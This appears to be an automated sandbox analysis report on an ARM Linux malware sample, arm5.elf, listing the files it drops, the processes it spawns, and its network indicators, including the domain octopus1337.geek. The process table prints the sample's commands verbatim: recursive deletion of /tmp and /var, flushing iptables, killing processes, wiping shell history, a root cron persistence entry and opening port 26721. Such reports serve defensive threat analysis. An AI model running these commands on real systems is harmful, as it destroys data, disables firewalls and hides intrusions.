Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm5.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
||
/dev/ocmount
|
Bourne-Again shell script, ASCII text executable
|
dropped
|
||
/etc/cron.d/mount.sh
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/arm5.elf
|
/tmp/arm5.elf
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache
/var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager
/var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup
/var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server
/var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm
/var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid
/var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket
/var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd
/var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd
/var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
/var/log/wtmp
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf /tmp/*"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/*
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -F"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -F
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 busybox"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 busybox
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 perl"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 perl
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 python"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 python
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "service iptables stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service iptables stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop iptables.service
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/sbin/iptables -F; /sbin/iptables -X"
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -F
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -X
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "service firewall stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service firewall stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop firewall.service
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "history -c"
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf ~/.bash_history"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /root/.bash_history
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "history -w"
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /dev/ocmount"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /dev/ocmount
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c /dev/ocmount
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
|
||
/usr/libexec/gsd-sharing
|
/usr/libexec/gsd-sharing
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
|
||
/usr/libexec/gsd-keyboard
|
/usr/libexec/gsd-keyboard
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
|
||
/usr/libexec/gsd-rfkill
|
/usr/libexec/gsd-rfkill
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
|
||
/usr/libexec/gsd-smartcard
|
/usr/libexec/gsd-smartcard
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
|
||
/usr/libexec/gsd-datetime
|
/usr/libexec/gsd-datetime
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
|
||
/usr/libexec/gsd-media-keys
|
/usr/libexec/gsd-media-keys
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
|
||
/usr/libexec/gsd-screensaver-proxy
|
/usr/libexec/gsd-screensaver-proxy
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
|
||
/usr/libexec/gsd-power
|
/usr/libexec/gsd-power
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/sda2
|
There are 166 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://Change_ip/octopus_re.sh;chmod
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
octopus1337.geek
|
156.238.224.214
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
109.202.202.202
|
unknown
|
Switzerland
|
||
212.118.43.167
|
unknown
|
Russian Federation
|
||
156.238.224.214
|
octopus1337.geek
|
Seychelles
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
91.189.91.42
|
unknown
|
United Kingdom
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fc00803d000
|
page execute read
|
|||
7fc00803d000
|
page execute read
|
|||
7fc10e393000
|
page read and write
|
|||
7fc10eb81000
|
page read and write
|
|||
7fc108021000
|
page read and write
|
|||
55b924699000
|
page read and write
|
|||
7fc10f06d000
|
page read and write
|
|||
7fc00804f000
|
page read and write
|
|||
7fc10ef44000
|
page read and write
|
|||
7fc10ed63000
|
page read and write
|
|||
7fc10e9f2000
|
page read and write
|
|||
7fc10e393000
|
page read and write
|
|||
7fc107fff000
|
page read and write
|
|||
7fc10e787000
|
page read and write
|
|||
7fc10db8b000
|
page read and write
|
|||
55b9214c5000
|
page execute read
|
|||
7fc10ed63000
|
page read and write
|
|||
7fc10f06d000
|
page read and write
|
|||
55b92371d000
|
page execute and read and write
|
|||
7fc10ef44000
|
page read and write
|
|||
7fc10e425000
|
page read and write
|
|||
7ffd6a3b5000
|
page read and write
|
|||
55b92171f000
|
page read and write
|
|||
7fc10e787000
|
page read and write
|
|||
55b924699000
|
page read and write
|
|||
55b921716000
|
page read and write
|
|||
55b92371d000
|
page execute and read and write
|
|||
7ffd6a3e9000
|
page execute read
|
|||
7fc10ea15000
|
page read and write
|
|||
7fc10f0d6000
|
page read and write
|
|||
7fc10e9f2000
|
page read and write
|
|||
7fc10f091000
|
page read and write
|
|||
7fc10db8b000
|
page read and write
|
|||
55b9246b9000
|
page read and write
|
|||
7fc00804a000
|
page read and write
|
|||
7fc10f0d6000
|
page read and write
|
|||
7fc108021000
|
page read and write
|
|||
7fc10e425000
|
page read and write
|
|||
55b923734000
|
page read and write
|
|||
7fc10f091000
|
page read and write
|
|||
7fc107fff000
|
page read and write
|
|||
55b921716000
|
page read and write
|
|||
55b9214c5000
|
page execute read
|
|||
7fc00804f000
|
page read and write
|
|||
7fc10ea15000
|
page read and write
|
|||
7ffd6a3b5000
|
page read and write
|
|||
7ffd6a3e9000
|
page execute read
|
|||
7fc10eb81000
|
page read and write
|
|||
7fc008051000
|
page read and write
|
|||
55b923734000
|
page read and write
|
|||
55b92171f000
|
page read and write
|
|||
7fc00804a000
|
page read and write
|
There are 42 hidden memdumps, click here to show them.